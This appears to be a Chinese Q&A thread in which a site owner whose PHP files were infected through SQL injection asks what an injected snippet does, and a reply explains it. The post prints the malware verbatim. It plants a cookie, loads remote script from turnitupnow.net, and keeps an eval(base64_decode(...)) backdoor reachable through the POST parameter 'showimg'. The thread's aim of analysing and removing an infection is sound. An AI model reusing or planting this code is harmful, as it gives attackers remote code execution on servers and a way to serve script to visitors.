Dar*_*UFO 10 javascript php cookies
我们的服务器通过一些SQL注入方法(现已修补)被黑客入侵.我们所有的PHP文件都将其添加到每个文件的最顶层.
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
它似乎设置了一个cookie,但我不知道它的作用.
任何专家能够理解这是什么以及可能创建的Cookie名称可能是什么样的,所以我可以告诉任何用户等
更新 看到该漏洞是由于Zenphoto Gallery软件中的一个名为Tiny_MCE的插件.
McK*_*Kay 10
首先它设置一个cookie.(命名为lb11)为102.
如果它(稍后?)找到cookie,它会将cookie设置为1000到9000之间的随机值,这样它就不会再次执行此操作:用户是否请求(并执行)一个javascript,它会发送哪个受感染的URL拨打电话,然后刷新页面,(因此在javascript运行后似乎没有发生任何事情.
但无论如何,如果将"showimg"参数传递给页面,它会查看该页面的内容,并在服务器上执行它.
因此,如果此代码存在,它将运行javascript(它还通知服务器哪个URL被感染,然后让该人在受感染的服务器上运行任意代码(通过showimg参数).
这有2层攻击,它可以用javascript攻击客户端,以后可以攻击服务器并在其上运行任意代码.